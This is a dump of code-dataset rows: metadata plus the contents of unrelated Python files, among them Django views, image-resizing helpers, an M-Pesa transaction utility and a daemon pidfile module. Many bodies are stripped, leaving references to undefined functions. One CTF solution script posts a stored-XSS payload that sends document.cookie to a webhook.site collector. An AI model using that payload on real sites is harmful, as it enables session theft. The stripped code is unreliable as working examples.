hexsha stringlengths 40 40 | size int64 5 2.06M | ext stringclasses 11 values | lang stringclasses 1 value | max_stars_repo_path stringlengths 3 251 | max_stars_repo_name stringlengths 4 130 | max_stars_repo_head_hexsha stringlengths 40 78 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 3 251 | max_issues_repo_name stringlengths 4 130 | max_issues_repo_head_hexsha stringlengths 40 78 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 116k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 3 251 | max_forks_repo_name stringlengths 4 130 | max_forks_repo_head_hexsha stringlengths 40 78 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 1 1.05M | avg_line_length float64 1 1.02M | max_line_length int64 3 1.04M | alphanum_fraction float64 0 1 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
b0b866e5edd6d67d39733549a96e6a2c9c924cf6 | 1,273 | py | Python | cblearn/datasets/tests/test_musician_similarity.py | JFHoelscher/cblearn | 18e3ac24f4d4fdb1e649bea201b18abe27862ef7 | [
"MIT"
] | 7 | 2021-11-19T13:53:56.000Z | 2022-03-28T18:39:04.000Z | cblearn/datasets/tests/test_musician_similarity.py | JFHoelscher/cblearn | 18e3ac24f4d4fdb1e649bea201b18abe27862ef7 | [
"MIT"
] | 20 | 2021-09-24T11:39:06.000Z | 2022-03-17T15:50:06.000Z | cblearn/datasets/tests/test_musician_similarity.py | JFHoelscher/cblearn | 18e3ac24f4d4fdb1e649bea201b18abe27862ef7 | [
"MIT"
] | 3 | 2021-11-24T13:23:17.000Z | 2022-03-24T08:57:20.000Z | import numpy as np
import pytest
from cblearn.datasets import fetch_musician_similarity
| 43.896552 | 98 | 0.741555 |
b0b9d81b27101a0308d3e4f404ef228daa426733 | 2,847 | py | Python | app/api/views.py | Olexsai2020/todo_app | f93faffefaaa78292930061867d4ecf772fa0add | [
"MIT"
] | null | null | null | app/api/views.py | Olexsai2020/todo_app | f93faffefaaa78292930061867d4ecf772fa0add | [
"MIT"
] | null | null | null | app/api/views.py | Olexsai2020/todo_app | f93faffefaaa78292930061867d4ecf772fa0add | [
"MIT"
] | null | null | null | from django.utils.decorators import method_decorator
from rest_framework import viewsets, status, generics
from rest_framework.response import Response
from rest_framework.permissions import AllowAny, IsAuthenticated
from rest_framework_jwt.authentication import JSONWebTokenAuthentication
from drf_yasg.utils import swagger_auto_schema
from .models import Todo
from .serializers import UserSignupSerializer, UserLoginSerializer, \
TodoSerializer
| 36.5 | 75 | 0.736916 |
b0ba70e5498a44a15d39de5effec074f2599f013 | 112 | py | Python | tests/test_mail_bug.py | FunTimeCoding/mail-bug | 185ed77ce92be44c9b37ebf380a1b80a1385c263 | [
"MIT"
] | null | null | null | tests/test_mail_bug.py | FunTimeCoding/mail-bug | 185ed77ce92be44c9b37ebf380a1b80a1385c263 | [
"MIT"
] | null | null | null | tests/test_mail_bug.py | FunTimeCoding/mail-bug | 185ed77ce92be44c9b37ebf380a1b80a1385c263 | [
"MIT"
] | null | null | null | from mail_bug.mail_bug import MailBug
| 16 | 37 | 0.669643 |
b0bb6683aa9dcadc69b57d035b577b7055890820 | 8,244 | py | Python | django_sqltools/common.py | yang0/django_sqltools | 44e7208337815d2fe8361824d223ba518bf38221 | [
"MIT"
] | null | null | null | django_sqltools/common.py | yang0/django_sqltools | 44e7208337815d2fe8361824d223ba518bf38221 | [
"MIT"
] | null | null | null | django_sqltools/common.py | yang0/django_sqltools | 44e7208337815d2fe8361824d223ba518bf38221 | [
"MIT"
] | null | null | null | # _*_coding:utf-8_*_
from django.conf import settings
import uuid, os, json, logging, time, shutil
from datetime import datetime, date
from PIL import Image, ImageFile
import mimetypes
import re
logger = logging.getLogger(__name__)
def getFileUri(fileInfo):
    """Return the URI component of a stored file-info string.

    A file-info string has the form ``"<uri>,<width>_<height>,<size>"``.
    Returns ``""`` when the input is ``None``, empty, or not made of
    exactly three comma-separated parts.
    """
    if fileInfo is None or fileInfo == "":
        return ""
    parts = fileInfo.split(",")
    return parts[0] if len(parts) == 3 else ""
def getFileName(fileInfo):
    """Return the first ``name.ext`` token found in *fileInfo*.

    Raises IndexError when no such token exists, as the original did.
    """
    matches = re.findall(r'\w+\.\w+', fileInfo)
    return matches[0]
def getPath(fileInfo):
    """Return the leading directory portion of a path-like string.

    Matches the first run of '/'-separated word characters that ends
    with '/'; raises IndexError when there is no such run.
    """
    matches = re.findall(r'[/\w]+[/]', fileInfo)
    return matches[0]
def moveFile(fileUri, folder):
    """Move a file stored under MEDIA_ROOT into *folder*.

    The date-based sub-path (e.g. ``/2019/07/12/``) embedded in *fileUri*
    is preserved below the new folder.  Returns the new URI relative to
    MEDIA_ROOT, or None when the source file does not exist.
    """
    source = settings.MEDIA_ROOT + fileUri
    if not os.path.exists(source):
        return
    # First '/'-delimited run in the URI, e.g. "/2019/07/12/".
    datePath = re.findall(r'[/][/\w]+[/]', fileUri)[0]
    targetDir = settings.MEDIA_ROOT + folder + datePath
    if not os.path.exists(targetDir):
        os.makedirs(targetDir)
    fileName = getFileName(fileUri)
    os.rename(source, targetDir + fileName)
    return folder + datePath + fileName
def getUploadImageSize(fileInfo):
    """Return the ``(width, height)`` recorded in a file-info string.

    The middle component of ``"<uri>,<width>_<height>,<size>"`` carries
    the dimensions; both are returned as strings.  ``(None, None)`` is
    returned when the input is empty or not three comma-separated parts.
    """
    if fileInfo is None or fileInfo == "":
        return None, None
    parts = fileInfo.split(",")
    if len(parts) != 3:
        return None, None
    size = parts[1].split("_")
    return size[0], size[1]
def getFileSize(fileInfo):
    """Return the recorded size component of a file-info string.

    The last component of ``"<uri>,<width>_<height>,<size>"``; None when
    the input is empty or does not have exactly three parts.
    """
    if fileInfo is None or fileInfo == "":
        return None
    parts = fileInfo.split(",")
    if len(parts) != 3:
        return None
    return parts[2]
def resizeImage(imgPath, thumbPath, width, height, pathRoot=settings.MEDIA_ROOT):
    """Create a resized copy of an image, preserving its aspect ratio.

    The image at ``pathRoot + imgPath`` is scaled so it fits inside a
    ``width`` x ``height`` box (it is never enlarged) and written to
    ``pathRoot + thumbPath``.

    :param imgPath: source image path, relative to ``pathRoot``
    :param thumbPath: destination path for the resized copy
    :param width: maximum result width in pixels
    :param height: maximum result height in pixels
    :param pathRoot: filesystem prefix, defaults to ``settings.MEDIA_ROOT``
    :return: True when the resized file exists afterwards, else False
    """
    img = pathRoot + imgPath
    resizeImg = pathRoot + thumbPath
    if os.path.exists(img):
        image = Image.open(img)
        # Target dimensions after the aspect-preserving fit.
        newWidth = 0
        newHeight = 0
        srcWidth, srcHeight = image.size
        if srcWidth <= width and srcHeight <= height:
            # Already fits inside the box -- keep the original size.
            newWidth = srcWidth
            newHeight = srcHeight
        else:
            # Shrink along the dimension that overflows the box the most.
            ratioH = 1.0 * srcHeight / height
            ratioW = 1.0 * srcWidth / width
            if ratioH >= ratioW:
                newHeight = height
                newWidth = int(1.0 * height / srcHeight * srcWidth)
            else:
                newWidth = width
                newHeight = int(1.0 * width / srcWidth * srcHeight)
        if image.format == 'GIF':
            # Palette-based GIFs are converted before resampling.
            # NOTE(review): convert() returns an image whose .format is
            # None, so save() then infers the format from the file
            # extension -- confirm this is the intended behaviour.
            image = image.convert('RGB')
        image.resize((newWidth, newHeight), Image.ANTIALIAS).save(resizeImg, format=image.format, quality=95)
        if os.path.exists(resizeImg):
            return True
    return False
def isImageSize(img, width, height):
    """Return True when the image at *img* is exactly width x height pixels."""
    actualWidth, actualHeight = Image.open(img).size
    return actualWidth == width and actualHeight == height
def getImageSize(img):
    """Return the ``(width, height)`` of the image at *img* in pixels."""
    srcWidth, srcHeight = Image.open(img).size
    return srcWidth, srcHeight
def cropImageCenter(img, newImg, width, height, pathRoot=settings.MEDIA_ROOT):
    """Produce a centred ``width`` x ``height`` crop of an image.

    When the source already fits the box in at least one dimension, the
    crop is taken directly from the source (clamped to its bounds).
    Otherwise the source is first scaled down so its shorter relative
    side matches the box and the crop is taken from the scaled copy.
    The result is written to ``pathRoot + newImg``.

    :param img: source image path, relative to ``pathRoot``
    :param newImg: destination path; also used as scratch space for the
        intermediate resized image in the second branch
    :param width: crop width in pixels
    :param height: crop height in pixels
    :param pathRoot: filesystem prefix, defaults to ``settings.MEDIA_ROOT``
    :return: True when the cropped file exists afterwards, else False
    """
    img = pathRoot + img
    newImg = pathRoot + newImg
    image = Image.open(img)
    srcWidth, srcHeight = image.size
    ratioH = 1.0 * srcHeight / height
    ratioW = 1.0 * srcWidth / width
    # Crop box corners: (left, upper, right, lower).
    x1 = 0
    y1 = 0
    x2 = 0
    y2 = 0
    if ratioW <= 1 or ratioH <= 1:
        # Source fits the box in at least one dimension: centre-crop the
        # original, clamping the box to the image bounds.
        x = int(1.0 * (srcWidth - width) / 2)
        x1 = x if x > 0 else 0
        y = int(1.0 * (srcHeight - height) / 2)
        y1 = y if y > 0 else 0
        x2 = x1 + width
        y2 = y1 + height
        x2 = x2 if x2 <= srcWidth else srcWidth
        y2 = y2 if y2 <= srcHeight else srcHeight
        box = (x1, y1, x2, y2)
        image.crop(box).save(newImg)
    else:
        # Source exceeds the box in both dimensions: shrink so the
        # shorter relative side matches the box, then centre-crop.
        newWidth = 0
        newHeight = 0
        if ratioW <= ratioH:
            newWidth = width
            newHeight = int(srcHeight / ratioW)
        else:
            newHeight = height
            newWidth = int(srcWidth / ratioH)
        if image.format == 'GIF':
            # Palette images must be converted before resampling.
            image = image.convert('RGB')
        image.resize((newWidth, newHeight), Image.ANTIALIAS).save(newImg, format=image.format, quality=95)
        x = int(1.0 * (newWidth - width) / 2)
        y = int(1.0 * (newHeight - height) / 2)
        x1 = x if x > 0 else 0
        y1 = y if y > 0 else 0
        x2 = x1 + width
        y2 = y1 + height
        x2 = x2 if x2 <= newWidth else newWidth
        y2 = y2 if y2 <= newHeight else newHeight
        box = (x1, y1, x2, y2)
        # Re-open the resized file and crop it in place.
        image = Image.open(newImg)
        image.crop(box).save(newImg)
    if os.path.exists(newImg):
        return True
    return False
| 31.346008 | 149 | 0.548156 |
b0bbdeb9ad8ad6836124106f4fb1414f2a3afe49 | 1,853 | py | Python | csn_searcher/loader.py | box-key/shanet | 6a2679a2dcb98dc4447af8eb453e297cd7585c79 | [
"Apache-2.0"
] | 2 | 2020-05-07T00:46:36.000Z | 2020-05-26T10:17:36.000Z | csn_searcher/loader.py | box-key/shanet | 6a2679a2dcb98dc4447af8eb453e297cd7585c79 | [
"Apache-2.0"
] | 2 | 2022-02-27T20:43:49.000Z | 2022-03-02T12:28:26.000Z | csn_searcher/loader.py | box-key/shanet | 6a2679a2dcb98dc4447af8eb453e297cd7585c79 | [
"Apache-2.0"
] | 1 | 2020-05-08T23:32:03.000Z | 2020-05-08T23:32:03.000Z | import requests
from tqdm import tqdm
from time import sleep
import os
| 38.604167 | 90 | 0.563411 |
b0bf332f22eca1ba57686a0f75bc10bbc8f9a9d8 | 75 | py | Python | components/server/src/shared/routes/plugins/__init__.py | ICTU/quality-time | 88d80ea30e35bd5f0bf5cce7cb43dc9f439e91f5 | [
"Apache-2.0"
] | 33 | 2016-01-20T07:35:48.000Z | 2022-03-14T09:20:51.000Z | components/server/src/shared/routes/plugins/__init__.py | ICTU/quality-time | 88d80ea30e35bd5f0bf5cce7cb43dc9f439e91f5 | [
"Apache-2.0"
] | 2,410 | 2016-01-22T18:13:01.000Z | 2022-03-31T16:57:34.000Z | components/server/src/shared/routes/plugins/__init__.py | ICTU/quality-time | 88d80ea30e35bd5f0bf5cce7cb43dc9f439e91f5 | [
"Apache-2.0"
] | 21 | 2016-01-16T11:49:23.000Z | 2022-01-14T21:53:22.000Z | """Bottle route plugins."""
from .injection_plugin import InjectionPlugin
| 18.75 | 45 | 0.786667 |
b0c2140b35a3bb72f96b2eb82a9fe58420a9a0cf | 4,419 | py | Python | airflow/providers/tesouro_gerencial/hooks/tesouro_gerencial.py | CarlosAdp/airflow-providers-tesouro-gerencial | f48ba321a5152dfd9b72107f640c66b217d59b9d | [
"MIT"
] | null | null | null | airflow/providers/tesouro_gerencial/hooks/tesouro_gerencial.py | CarlosAdp/airflow-providers-tesouro-gerencial | f48ba321a5152dfd9b72107f640c66b217d59b9d | [
"MIT"
] | null | null | null | airflow/providers/tesouro_gerencial/hooks/tesouro_gerencial.py | CarlosAdp/airflow-providers-tesouro-gerencial | f48ba321a5152dfd9b72107f640c66b217d59b9d | [
"MIT"
] | null | null | null | from enum import Enum
from typing import List, Union
from urllib.parse import urljoin
import warnings
from airflow.exceptions import AirflowException
from airflow.providers.siafi.hooks.siafi import SIAFIHook
import requests
warnings.filterwarnings('ignore', message='Unverified HTTPS request')
| 32.977612 | 76 | 0.605114 |
b0c27fbbd572c04635510356965faf39003f2e6a | 843 | py | Python | offensive_nn/models/offensive_lstm_model.py | TharinduDR/OffensiveNN | 336b377c44a7067d2e23ca4a8d331ce7f99157cc | [
"Apache-2.0"
] | null | null | null | offensive_nn/models/offensive_lstm_model.py | TharinduDR/OffensiveNN | 336b377c44a7067d2e23ca4a8d331ce7f99157cc | [
"Apache-2.0"
] | null | null | null | offensive_nn/models/offensive_lstm_model.py | TharinduDR/OffensiveNN | 336b377c44a7067d2e23ca4a8d331ce7f99157cc | [
"Apache-2.0"
] | null | null | null | import tensorflow as tf
from tensorflow import keras
from tensorflow.keras import layers
| 42.15 | 93 | 0.664294 |
b0c2a699dca314b9665d88e6e73956104ae6f215 | 2,852 | py | Python | st_library/utils/databases/postgres.py | shortesttrack/dataprovider-py | 3ecbcb5e09da09614a708e4ef990acdd3443c6ed | [
"Apache-2.0"
] | null | null | null | st_library/utils/databases/postgres.py | shortesttrack/dataprovider-py | 3ecbcb5e09da09614a708e4ef990acdd3443c6ed | [
"Apache-2.0"
] | 2 | 2018-03-27T11:06:46.000Z | 2020-10-27T20:48:51.000Z | st_library/utils/databases/postgres.py | shortesttrack/dataprovider-py | 3ecbcb5e09da09614a708e4ef990acdd3443c6ed | [
"Apache-2.0"
] | 4 | 2018-02-26T08:12:39.000Z | 2018-05-18T06:01:01.000Z | import backoff
import psycopg2
from psycopg2.extras import DictCursor, NamedTupleCursor
from st_library.utils.generics.connectors import ConnectorContainer
# psycopg2 exception classes that signal a lost server connection.
_disconnect_errors = (psycopg2.InterfaceError, psycopg2.OperationalError,)
# Retry decorator: exponential backoff on disconnect errors, giving up
# after 30 seconds or 30 attempts, whichever comes first.
_backoff = backoff.on_exception(backoff.expo, _disconnect_errors, max_time=30, max_tries=30)
def fetchall(self):
    """Delegate ``fetchall`` to the wrapped database cursor."""
    return self._cursor.fetchall()
def fetchmany(self, *args, **kwargs):
    """Delegate ``fetchmany`` to the wrapped cursor; arguments pass through."""
    return self._cursor.fetchmany(*args, **kwargs)
def fetchone(self):
    """Delegate ``fetchone`` to the wrapped database cursor."""
    return self._cursor.fetchone()
| 29.102041 | 92 | 0.630435 |
b0c2f5602738aeed19e70471739de83515468bde | 566 | py | Python | examples/date-format.py | adamantonio/gooeypie | a60416a6a317f83e89541d6fdcac3559ace87cac | [
"MIT"
] | 1 | 2021-11-20T16:28:47.000Z | 2021-11-20T16:28:47.000Z | examples/date-format.py | adamantonio/gooeypie | a60416a6a317f83e89541d6fdcac3559ace87cac | [
"MIT"
] | null | null | null | examples/date-format.py | adamantonio/gooeypie | a60416a6a317f83e89541d6fdcac3559ace87cac | [
"MIT"
] | null | null | null | import gooeypie as gp
date_formats = ['28/8/20', '8/28/20', '28/08/2020', '08/28/2020', '2020-08-28',
'28-Aug-2020', 'Friday, August 28, 2020', 'Friday, 28 August, 2020',
'August 28, 2020', '28 August, 2020']
app = gp.GooeyPieApp('Time and date')
app.width = 250
label = gp.Label(app, 'Available formats:')
date_options = gp.Listbox(app, date_formats)
date_options.height = 8
ok = gp.Button(app, 'OK', None)
ok.width = 10
app.set_grid(3, 1)
app.add(label, 1, 1)
app.add(date_options, 2, 1, fill=True)
app.add(ok, 3, 1)
app.run()
| 25.727273 | 84 | 0.627208 |
b0c3406b4cbc0b4a885af800bf5115dce13d7dd2 | 1,131 | py | Python | color_contrast_calc/converters/grayscale.py | nico-hn/color_contrast_calc_py | 92cf9eecbd8e5d000f284ec786103cb719df6026 | [
"MIT"
] | 2 | 2020-10-01T11:50:30.000Z | 2020-10-11T20:59:06.000Z | color_contrast_calc/converters/grayscale.py | nico-hn/color_contrast_calc_py | 92cf9eecbd8e5d000f284ec786103cb719df6026 | [
"MIT"
] | null | null | null | color_contrast_calc/converters/grayscale.py | nico-hn/color_contrast_calc_py | 92cf9eecbd8e5d000f284ec786103cb719df6026 | [
"MIT"
] | 1 | 2019-06-18T02:08:06.000Z | 2019-06-18T02:08:06.000Z | # https://www.w3.org/TR/filter-effects/#funcdef-grayscale
# https://www.w3.org/TR/filter-effects/#grayscaleEquivalent
# https://www.w3.org/TR/SVG/filters.html#feColorMatrixElement
import numpy as np
from . import rgb_clamp
# Components of the W3C filter-effects grayscale matrix (see URLs above).
# Every output channel mixes R, G and B with the Rec. 709 luma weights.
_CONST_PART = np.array([[0.2126, 0.7152, 0.0722],
                        [0.2126, 0.7152, 0.0722],
                        [0.2126, 0.7152, 0.0722]])
# Identity-minus-luma component; presumably scaled by the grayscale
# ratio in the (module-private) matrix builder used by calc_rgb.
_RATIO_PART = np.array([[0.7874, -0.7152, -0.0722],
                        [-0.2126, 0.2848, -0.0722],
                        [-0.2126, -0.7152, 0.9278]])
def calc_rgb(rgb, s):
    """Convert a passed color to grayscale.

    The calculation is based on the definition found at
    https://www.w3.org/TR/filter-effects/#funcdef-grayscale

    :param rgb: The Original RGB value before the conversion.
    :type rgb: (int, int, int)
    :param s: Conversion ratio in percentage
    :type s: float
    :return: RGB value of grayscale color
    :rtype: (int, int, int)
    """
    # _calc_grayscale (module-private, defined elsewhere in this module)
    # builds the 3x3 conversion matrix for ratio *s*; rgb_clamp
    # presumably clamps each resulting channel to the valid RGB range.
    return rgb_clamp((_calc_grayscale(s) * np.array(rgb)).sum(1))
| 29.763158 | 65 | 0.612732 |
b0c414717803420c137b57f5097d0149ee8b7ac9 | 2,285 | py | Python | Coursera/Google_IT_Automation_with_Python/01_Crash_Course_on_Python/Week_5/wk5_mod3_ex2.py | ssolomon2020/Self_Study_Python_Training | b253093b185f4a0d98cb8565f5fcf2b0e4a99556 | [
"MIT"
] | null | null | null | Coursera/Google_IT_Automation_with_Python/01_Crash_Course_on_Python/Week_5/wk5_mod3_ex2.py | ssolomon2020/Self_Study_Python_Training | b253093b185f4a0d98cb8565f5fcf2b0e4a99556 | [
"MIT"
] | null | null | null | Coursera/Google_IT_Automation_with_Python/01_Crash_Course_on_Python/Week_5/wk5_mod3_ex2.py | ssolomon2020/Self_Study_Python_Training | b253093b185f4a0d98cb8565f5fcf2b0e4a99556 | [
"MIT"
] | null | null | null | # Specialization: Google IT Automation with Python
# Course 01: Crash Course with Python
# Week 5 Module Part 3 Exercise 02
# Student: Shawn Solomon
# Learning Platform: Coursera.org
# Lets expand a bit on our Clothing classes from the previous in-video question. Your mission:
# Finish the "Stock_by_Material" method and iterate over the amount of each item of a given
# material that is in stock. When youre finished, the script should add up to 10 cotton Polo shirts.
# class Clothing:
# stock={ 'name': [],'material' :[], 'amount':[]}
# def __init__(self,name):
# material = ""
# self.name = name
# def add_item(self, name, material, amount):
# Clothing.stock['name'].append(self.name)
# Clothing.stock['material'].append(self.material)
# Clothing.stock['amount'].append(amount)
# def Stock_by_Material(self, material):
# count=0
# n=0
# for item in Clothing.stock['___']:
# if item == material:
# count += Clothing.___['amount'][n]
# n+=1
# return count
#
# class shirt(Clothing):
# material="Cotton"
# class pants(Clothing):
# material="Cotton"
#
# polo = shirt("Polo")
# sweatpants = pants("Sweatpants")
# polo.add_item(polo.name, polo.material, 4)
# sweatpants.add_item(sweatpants.name, sweatpants.material, 6)
# current_stock = polo.Stock_by_Material("Cotton")
# print(current_stock)
# Demo driver: create one shirt and one pants instance (classes defined
# elsewhere in this file), register stock for each, then report the
# total amount of cotton items held.
polo = shirt("Polo")
sweatpants = pants("Sweatpants")
polo.add_item(polo.name, polo.material, 4)
sweatpants.add_item(sweatpants.name, sweatpants.material, 6)
current_stock = polo.Stock_by_Material("Cotton")
print(current_stock)  # per the exercise text, this should print 10
b0c4a12b9a13aa11699c0f68047498ec12883a9b | 845 | py | Python | dictionary.py | LordGhostX/ECXBotsMastery | 199000f8c24b30734869e8bbdebb5901604cd0fa | [
"MIT"
] | 2 | 2021-07-17T20:09:24.000Z | 2021-08-09T13:48:38.000Z | dictionary.py | LordGhostX/ECXBotsMastery | 199000f8c24b30734869e8bbdebb5901604cd0fa | [
"MIT"
] | null | null | null | dictionary.py | LordGhostX/ECXBotsMastery | 199000f8c24b30734869e8bbdebb5901604cd0fa | [
"MIT"
] | 1 | 2021-07-17T00:12:07.000Z | 2021-07-17T00:12:07.000Z | import requests
from bs4 import BeautifulSoup
if __name__ == "__main__":
print(find_word_meaning("intense"))
| 33.8 | 94 | 0.620118 |
b0c74b2e81942f6fdda3626e4e0173d3f260b19b | 1,328 | py | Python | client/query_modules/music_module.py | abhishekg785/hiro | 950224d07797740b8840316bb412c1827eab46f0 | [
"MIT"
] | 7 | 2017-04-12T10:58:42.000Z | 2021-10-03T18:07:29.000Z | client/query_modules/music_module.py | abhishekg785/hiro | 950224d07797740b8840316bb412c1827eab46f0 | [
"MIT"
] | null | null | null | client/query_modules/music_module.py | abhishekg785/hiro | 950224d07797740b8840316bb412c1827eab46f0 | [
"MIT"
] | 5 | 2017-07-06T12:28:10.000Z | 2020-01-07T19:45:25.000Z | # simply handles the reply for hello by the user
import re
import random
import os
import sys
import webbrowser
from random import randint
# getting the watson api functions here
PATH = os.path.normpath(os.path.join(os.path.dirname(os.path.abspath(__file__)), os.pardir))
sys.path.append(PATH)
MUSIC_PATH = os.path.normpath(os.path.join(os.path.dirname(os.path.abspath(__file__)), os.pardir)) + '/music/'
# print MUSIC_PATH
from watson import WatsonAPI
watson = WatsonAPI()
# take necessary actions
# validate the module for the text from the source ( user, server, bot etc ) | 30.181818 | 110 | 0.709337 |
b0c77869671d10fbedbed340a7a7c9b4e8912459 | 2,993 | py | Python | ocdsapi_outlet/utils.py | openprocurement/ocdsapi_outlet | e5aab856fbb833d34c4d56831cad7c09d7719a5e | [
"Apache-2.0"
] | null | null | null | ocdsapi_outlet/utils.py | openprocurement/ocdsapi_outlet | e5aab856fbb833d34c4d56831cad7c09d7719a5e | [
"Apache-2.0"
] | 6 | 2019-12-26T16:43:14.000Z | 2022-03-21T22:16:25.000Z | ocdsapi_outlet/utils.py | openprocurement/ocdsapi_outlet | e5aab856fbb833d34c4d56831cad7c09d7719a5e | [
"Apache-2.0"
] | 1 | 2018-07-27T16:19:27.000Z | 2018-07-27T16:19:27.000Z | """ utils.py - helper functions """
import logging
import functools
import operator
from repoze.lru import lru_cache
from gevent import spawn
from gevent.subprocess import Popen, PIPE
try:
import boto3
except ImportError:
boto3 = None
def dump(app, logger):
    """
    Run dump script as separate process.

    Builds the command line from ``app.config``, launches it with piped
    stdout/stderr, drains both pipes in background greenlets, and blocks
    until the child exits.

    :param app: application object whose ``config`` is passed to
        ``prepare_pack_command`` (defined elsewhere in this module)
    :param logger: logger used for progress and exit-code messages
    """
    args = prepare_pack_command(app.config)
    logger.warn("Going to start dump with args {}".format(args))
    popen = Popen(args, stdout=PIPE, stderr=PIPE)
    # Read both pipes concurrently so the child cannot block on a full
    # pipe buffer; read_stream is defined elsewhere in this module.
    spawn(read_stream, popen.stdout)
    spawn(read_stream, popen.stderr)
    popen.wait()
    return_code = popen.returncode
    logger.info("Dumper ended work with code {}".format(return_code))
def find_package_date(releases):
    """Return the latest ``'date'`` value among the given release dicts.

    Raises ValueError on an empty sequence and KeyError when a release
    lacks a ``'date'`` entry, mirroring ``max`` with a key function.
    """
    latest = max(releases, key=lambda release: release['date'])
    return latest.get('date')
def prepare_package(date, metainfo=None):
    """Build a skeleton release package dict.

    :param date: publication date stored under ``publishedDate``
    :param metainfo: optional mapping merged over the defaults
        (a falsy mapping is ignored)
    :return: dict with an empty ``releases`` list and blank publisher
    """
    package = {
        'publishedDate': date,
        'releases': [],
        'publisher': {'name': '', 'scheme': '', 'uri': ''},
    }
    if metainfo:
        package.update(metainfo)
    return package
| 25.364407 | 74 | 0.559973 |
b0c81b1e5cf0bc462adf9bdbb74fbefc166b797e | 264 | py | Python | apps/logger.py | dabble-of-devops-bioanalyze/single-cell-cloud-lab | 324bf936297b6a5bd23d4f7e1cf3cbd6b31ba495 | [
"Apache-2.0"
] | null | null | null | apps/logger.py | dabble-of-devops-bioanalyze/single-cell-cloud-lab | 324bf936297b6a5bd23d4f7e1cf3cbd6b31ba495 | [
"Apache-2.0"
] | null | null | null | apps/logger.py | dabble-of-devops-bioanalyze/single-cell-cloud-lab | 324bf936297b6a5bd23d4f7e1cf3cbd6b31ba495 | [
"Apache-2.0"
] | null | null | null | import colorlog
# Stream handler whose records are tinted by log level via the
# `log_color` placeholder, prefixed with level/name/file/function.
handler = colorlog.StreamHandler()
handler.setFormatter(
    colorlog.ColoredFormatter(
        "%(log_color)s%(levelname)s:%(name)s:%(filename)s:%(funcName)s: %(message)s"
    )
)
# Module-level logger with the colored handler attached.
logger = colorlog.getLogger(__name__)
logger.addHandler(handler)
| 22 | 84 | 0.719697 |
b0c97b770b216db5c6e4a8a50cbc39cc9f11e3a2 | 1,467 | py | Python | venv/lib/python2.7/site-packages/daemon/pidfile.py | mutaihillary/mycalculator | 55685dd7c968861f18ae0701129f5af2bc682d67 | [
"MIT"
] | null | null | null | venv/lib/python2.7/site-packages/daemon/pidfile.py | mutaihillary/mycalculator | 55685dd7c968861f18ae0701129f5af2bc682d67 | [
"MIT"
] | 7 | 2021-02-08T20:22:15.000Z | 2022-03-11T23:19:41.000Z | venv/lib/python2.7/site-packages/daemon/pidfile.py | mutaihillary/mycalculator | 55685dd7c968861f18ae0701129f5af2bc682d67 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# daemon/pidfile.py
# Part of python-daemon, an implementation of PEP 3143.
#
# Copyright 20082010 Ben Finney <ben+python@benfinney.id.au>
#
# This is free software: you may copy, modify, and/or distribute this work
# under the terms of the Python Software Foundation License, version 2 or
# later as published by the Python Software Foundation.
# No warranty expressed or implied. See the file LICENSE.PSF-2 for details.
""" Lockfile behaviour implemented via Unix PID files.
"""
from __future__ import absolute_import
from lockfile.pidlockfile import PIDLockFile
| 34.116279 | 75 | 0.691888 |
b0c9cd685e3c553d9d38e5a73ed8bdcbc7f01131 | 11,258 | py | Python | zazi/apps/mpesa/utils/transaction.py | felixcheruiyot/zazi-core-banking | 0a2dac42235adcac3cf8c114961e407f54844223 | [
"Apache-2.0"
] | null | null | null | zazi/apps/mpesa/utils/transaction.py | felixcheruiyot/zazi-core-banking | 0a2dac42235adcac3cf8c114961e407f54844223 | [
"Apache-2.0"
] | 1 | 2021-08-20T06:41:57.000Z | 2021-08-20T06:41:57.000Z | zazi/apps/mpesa/utils/transaction.py | felixcheruiyot/zazi-core-banking | 0a2dac42235adcac3cf8c114961e407f54844223 | [
"Apache-2.0"
] | null | null | null | import logging
from django.db import transaction as db_transaction
from django.conf import settings
from django.utils import timezone
from django.urls import reverse_lazy
from zazi.core.utils import get_absolute_url, get_encrypted_text
from .. import api
from ..models import (
MpesaAccount,
MpesaAccountBalance,
MpesaAccountRegisteredURL,
MpesaAPIAccount,
MpesaTransaction,
generate_id)
from ..enums import IdentifierType, CommandID, ResultCode, MpesaTransactionStatus
logger = logging.getLogger(__name__)
| 38.162712 | 119 | 0.669213 |
b0cb0c2e438281324253c5fc9aef08d9586a6478 | 297 | py | Python | gCTF/gctf20/Pasteurize/asd.py | shagunattri/ctfwriteups | 02654f9feeef43aa28c321a7bd9c13a39be8f137 | [
"MIT"
] | 1 | 2020-06-11T18:04:22.000Z | 2020-06-11T18:04:22.000Z | gCTF/gctf20/Pasteurize/asd.py | shagunattri/MemeBoard | 02654f9feeef43aa28c321a7bd9c13a39be8f137 | [
"MIT"
] | 1 | 2021-03-22T09:51:13.000Z | 2021-03-22T09:51:13.000Z | gCTF/gctf20/Pasteurize/asd.py | shagunattri/MemeBoard | 02654f9feeef43aa28c321a7bd9c13a39be8f137 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
#JOHN Hammond method result
import requests
# Target of the Google CTF 2020 "Pasteurize" web challenge.
url = "https://pasteurize.web.ctfcompetition.com/"
# Submit a paste whose content is a stored-XSS payload: when rendered,
# it loads an image from a webhook.site collector with the viewer's
# cookie appended to the query string, exfiltrating the cookie.
req = requests.post(url,data = {
    "content[]": ";new Image().src='https://webhook.site/8db05257-6ad1-44a9-979a-574c1caca5d6?asdf='+document.cookie//"
})
print(req.text)
| 18.5625 | 119 | 0.703704 |
b0cb84a469618ec441c72fc62b1918615cc6f4ec | 7,437 | py | Python | src/test/py/ltprg/results/plot.py | forkunited/ltprg | 4e40d3571d229023df0f845c68643024e04bc202 | [
"MIT"
] | 11 | 2017-08-03T15:42:19.000Z | 2021-02-04T12:43:35.000Z | src/test/py/ltprg/results/plot.py | forkunited/ltprg | 4e40d3571d229023df0f845c68643024e04bc202 | [
"MIT"
